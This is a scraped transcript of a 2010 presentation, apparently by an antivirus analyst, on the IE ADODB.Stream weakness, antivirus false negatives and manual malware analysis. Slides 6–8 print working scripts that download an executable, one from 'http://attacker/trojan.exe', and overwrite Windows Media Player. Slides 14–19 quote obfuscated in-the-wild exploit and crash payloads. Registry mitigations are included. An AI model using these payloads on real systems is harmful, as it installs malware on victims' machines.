1 / 22

Shasta Console Operations

Shasta Console Operations. February 2010 Tony Caleb. Agenda. MSIE ADODB. Stream Object Installation Weakness. AV/IS FN Detection. Dynamic Analysis. Introduction.

debra
Download Presentation

Shasta Console Operations

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Shasta Console Operations February 2010 Tony Caleb

  2. Agenda MSIE ADODB. Stream Object Installation Weakness AV/IS FN Detection DynamicAnalysis

  3. Introduction • MSIE ADODB.Stream Object Installation Weakness is the BROWSER EXPLOIT, that allows the hackers to attack a system through browser, install it’s activex controls and takes over the victims system. • This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening. - SYMANTEC • ADODB.stream provides a method for reading and writing files on a hard drive. This by-design functionality is sometimes used by web applications. However, when combined with known security vulnerabilities in Microsoft Internet Explorer, it could allow an internet web site to execute script from the Local Machine Zone (LMZ). This occurs because the ADODB.Stream object allows access to the hard drive when hosted within Internet Explorer. - MICROSOFT • This weakness depends on scripting that abuses the ADODB.Stream Object to write an attacker-specified file to the victim file system. – SECURITY FOCUS

  4. How does it occurs? • Microsoft Internet Explorer is prone to a security weakness that may permit malicious HTML documents to create or overwrite files on a victim file system when interpreted from the Local Zone (or other Security Zones with relaxed security restrictions, such as the Intranet Zone).

  5. What it does in infected machine? • This weakness depends on scripting that abuses the ADODB.Stream Object to write an attacker-specified file to the victim file system. In this manner, an HTML document that is interpreted in the context of a Security Zone with relaxed security restrictions may install a malicious file on the victim file system. • The stream object contains several methods for reading and writing binary files and text files. When this by-design functionality is combined with known security vulnerabilities in Microsoft Internet Explorer, an Internet Web site could execute script from the Local Machine zone. This behavior occurs because the ADODB.Stream object permits access to the hard disk when the ADODB.Stream object is hosted in Internet Explorer • The error that displays on the page when the script is been executed ( It makes the user think that • just a error has occurred so that the page is not loaded but the malicious content is been downloaded • in his system without his knowledge) • error.jsp is a jsp page that consists of one line, namely<% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %> • (Just to send a false header in IE)

  6. Sample Code How a file is been downloaded into a victims system • const adTypeBinary = 1const adSaveCreateOverwrite = 2const adModeReadWrite = 3set xmlHTTP = CreateObject("Microsoft.XMLHTTP")xmlHTTP.open "GET","http://ip3e83566f.speed.planet.nl/NOTEPAD.EXE",falsexmlHTTP.sendcontents = xmlHTTP.responseBodySet oStr = CreateObject("ADODB.Stream")oStr.Mode = adModeReadWriteoStr.Type = adTypeBinaryoStr.OpenoStr.Write(contents)oStr.SaveToFile "c:\\test.exe", adSaveCreateOverwrite</script> 

  7. Sample Code How this exploit can be made in vmplayer • var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "http://attacker/trojan.exe",0);x.Send();var s = new ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);location.href = "mms://";

  8. Modification of vmplayer.exe Code for the modification of Windows Media Player • <script language="javascript“>function preparecode(code) • {result = '';lines = code.split(/\r\n/);for (i=0;i<lines.length;i++) • {line = lines[i];if (line != '') • {result += line +'\\r\\n';}}return result;}function doit() • {mycode = preparecode(document.all.code.value);myURL = "file:javascript:eval('" + mycode + "')";window.open(myURL,"_media")}window.open("error.jsp","_media");setTimeout("doit()", 5000);</script>

  9. How to Overcome This Issue Changing the keys in the Registry • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4} Disabling of ActiveX controls • Disabling of any kind of ActiveX controls in the IE security. So that it does not allow anything to download by itself( Anyhow in the older versions of the Internet Explorer it is not possible).

  10. Changing the keys in the Registry • Close any open Internet Explorer browser windows. • Click Start, and then click Run. • In the Open box, type Regedit, and then click OK. • In Registry Editor, locate the following registry key: • “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility” • Right-click ActiveX Compatibility, point to New, and then click Key. • Type the following name for the key: • {00000566-0000-0010-8000-00AA006D2EA4} • Close Registry Editor.

  11. Samples of FN Detection MSIE Event Object Mem Corruption Code Exec • The domain “khan.co.kr” with URL http://gallery.khan.co.kr/ is found to have the above threat but during the manual analysis of this URL NIS does not detect it. Here the hackers have bypassed the AV/IS. HTTP MSIE Style Tag Cmt Mem Corruption • The domainVoy.com with the URL http://www.voy.com//76583 is found to have the above threat but during the manual analysis of this URL and the AV/IS fail to detect. Trojan.Malscript.B • This is a common FN that we find in with IS. • Here a script that redirects to malicious links will be given in the encoded format and since the redirect link is not active NIS but it will change dynamically. • This clearly proves that the malicious content is intentionally done since the script tag is present after the close html tag.

  12. MSIE Event Object Mem Corruption Code Exec

  13. MSIE Event Object Mem Corruption Code Exec

  14. MSIE Event Object Mem Corruption Code Exec Code in the index2.html eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString (36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function() {return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('g a=1b;g 2="%u";g 1B="%2E%w%2t%c%2w"+2+"b";g 10="%P%34%h%39"+2+"6";g 1l="%C%B%A%h%36";g 1C="%2Y%2Q%2P%2T%1P%1W";g s=a("%1O%1L"+2+"6%M%1H%1F% K%1E%1K"+2+"6%1a%1N%2m%2a%S%4b"+2+"b%4a");s+=a("%q%N%y%49"+2+"6%41%f%k%4w"+2+"6%4r%q%N%y%4s"+2+"6%3s%f%k");s+=a("% 3w"+2+"6%3V%q%N%y%1y"+2+"6%3E%f%k%3I"+2+"6%3H%1s%17%3G%M%16");s+=a("%19%1e%r%k%4c"+2+"6%R%1s%17%3J%M%16%19%3A%r%k% 3B"+2+"6%R");s+=a("%3C%3D"+2+"6%1a%3L%3S%3T%3U%3R%3Q%3M%3N%3O%3P%3z%3y%3i%3j%3k"+"F"+"0"+"5");s+=a("%3l%3h%3g%3c%3d% 3e"+2+"6%3f%X%3m%1c%J%L%3n%15%3u");s+=a("%L%3v%1c%J%L%3t%15%3o%3p%W%P%3q%f%3r%14%1e%q");s+=a("%k%3X"+2+"6%Q%4t%4u%4v%4q% 4m%4n%4o%4p%X%4x%4E%4F%4G");s+=a("%4D%4C%W%12%1z%4y%4z%4A%4B%4l%4k%44%1z%46%47%43%42");s+=a("%3Y%3Z"+2+"6%40%14%P"+10+"% 4g"+2+"6%4h%4i"+2+"6%4j");s+=a("%4f"+2+"b%m%4e"+2+"6%12%11%11%l%3b%4d%4H%2U%27%28%29%u"+"4"+"1"+"9"+"0");s+=a("%26%25%21% 22%23%24%2b"+2+"b%c%2c"+2+"b%2j%2k%2l%1y%2i"+2+"b");s+=a("%18%1f%1r%2h"+2+"6%h%2d"+2+"6%l%1q%1t%1u%1x%2e"+2+"6%1w%

  15. MSIE Event Object Mem Corruption Code Exec Code in the index2.html 1v");s+=a("%S%2f"+2+"6%20"+2+"6%K%S%1V"+2+"b%1G%1J%1f%1r%1M"+2+"6%h%1I");s+=a(""+2+"6%l%1q%1t%1u%1x%1Z"+2+"6%1w%1v%1X%1Y% 1U%1T%R%1Q"+2+"b");s+=a("%1R%1S%2g%Q%3a%2o%2V%2W%2X"+2+"6%l%Q%2S%2O%U%2R%2Z");s+=a("%37%38"+2+"6%35%30%31%32%33%2N%2M%r%K% 2x%y%2y"+2+"6%l");s+=a("%2z%2v%1d%w%J%2u%2q%2p%2r%2s"+2+"6%l%z%2A%2B%f"+2+"6");s+=a("%2I%2J"+2+"6%2K%2L%2H%1n%w%1k%2G%v% 1j%2C%r%1g%2D"+2+"b");s+=a("%1h"+2+"b%1i%d%2F%45%5k%76"+1l+""+2+"b%h%75"+2+"6");s+=a("%4I%v%m%E"+2+"b%z%I%78%79%U%74%73%C% B%A%h%6Z");s+=a(""+2+"b%h%6Y"+2+"6%70%v%m%E"+2+"b%z%I%71%72%U%7b%7j%C");s+=a("%B%A%h%7m"+2+"b%h%7i"+2+"6%7h%v%m%E"+2+"b%z% I%7g%6X");s+=a("%6W%1n%w%1k%6E%6D%1j%6F%f%1g%6G"+2+"b%1h"+2+"b%1i%6H%c");s+=a("%6C"+2+"6%6B%6x%6w%6y%f%e%d%c%6z"+2+"6%6A% 6I%6J%6S%f");s+=a("%e%d%c%6R"+2+"6%6T%6U%6V%6Q%f%e%d%c%6P"+2+"6%6L%6K");s+=a("%6M%7o%f%e%d%c%6N"+2+"6%6O%7n%7x%86%f%e%d%c% 7R");s+=a(""+2+"b%7Q%87%7W%7X%f%e%d%c%7Y"+2+"6%7Z%7V%7U%7P%f%e");s+=a("%d%c%7S"+2+"6%7T%80%81%88%f%e%d%c%82"+2+"b%83%84% 85");s+=a("%7N%f%e%d%c%7w"+2+"b%7O%7y%Z%7z%f%e%d%c%7v"+2+"6");s+=a("%7u%7q%7p%7r"+2+"6%e%d%c%7s"+2+"6%7t%7A%7B%7J"+2+"6%e%

  16. HTTP MSIE Style Tag Cmt Mem Corruption The /* is closed after the end of style tag that is after 80,000 lines of garbage stuff. Due to insertion of these unwanted stuff, the memory stack is overflow and as a result the entire browser crashes. URL : hxxp://www.voy.com//76583/ <!-- google_ad_section_start --><style type=text/css>body{background-repeat:repeat;background-color:black;background-image:none;color:black;visibility:hidden;font-size:10000;line-height:10000;letter-spacing:10000;text-decoration:blink;text-align:right;margin-top:10000;}form{visibility:hidden;}table{visibility:hidden;}a{visibility:hidden;}img{visibility:hidden;}input{visibility:hidden;}</style><A rel=nofollow target=_blank HREF=https:???????????????????????????????????????????? > <style>@;/*<<BR>

  17. Manual Analysis How we do the manual analysis Tools we use for manual analysis Samples

  18. Tools Used for Manual Analysis HTTP Analyzer TCP Viewer Process Explorer Systracer (System Tracer) Start up programs ( msconfig,services.msc)

  19. HTTP Malicious Toolkit Variant Activity From URL: <script language=JavaScript> function bfbn15(p){ var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,31,62,3,50,13,56,52,26,53,0,0,0,0,0,0,30,58,61,15,25,14,41,59,1,51,47,10,54,29,24,57,43,49,42,34,19,55,38,28,32,20,40,0,0,0,0,46,0,17,48,18,44,36,22,5,7,35,11,37,2,27,0,8,39,23,6,33,45,16,21,9,60,4,12);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(129^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}bfbn15('Li2GkG_BJK1BXqCB4IPFgG2GemR_kG_67IEOJq0PLCCA9T@RVLjApCC6dT@ZJ3EGeIm_pC2OXj@Z4CJ6xE8A9q1xGARPV3@Be1PAJS2GpG_P9GRJVRKIXq1AJEJG70@OF4z69p2PI32GkGEGFSARUfm_QSRRVVGOi1E6SmRRVE8ZLi@O9pEJbVmdsVEOZm@A9IPdUrRx9i1GeIGZki_xQUE66JGG_0EOi2mJ_S2OI3EGe0PFZl') </script> After Decoding < script language = JavaScript > function bfbn15(p) bfbn15('Li2GkG_BJK1BXqCB4IPFgG2GemR_kG_67IEOJq0PLCCA9T@RVLjApCC6dT@ZJ3EGeIm_pC2OXj@Z4CJ6xE8A9q1xGARPV3@Be1PAJS2GpG_P9GRJVRKIXq1AJEJG70@OF4z69p2PI32GkGEGFSARUfm_QSRRVVGOi1E6SmRRVE8ZLi@O9pEJbVmdsVEOZm@A9IPdUrRx9i1GeIGZki_xQUE66JGG_0EOi2mJ_S2OI3EGe0PFZl')  </script>

  20. HTTP Malicious Toolkit Variant Activity

  21. HTTP Malicious Toolkit Variant Activity

  22. Thank You

More Related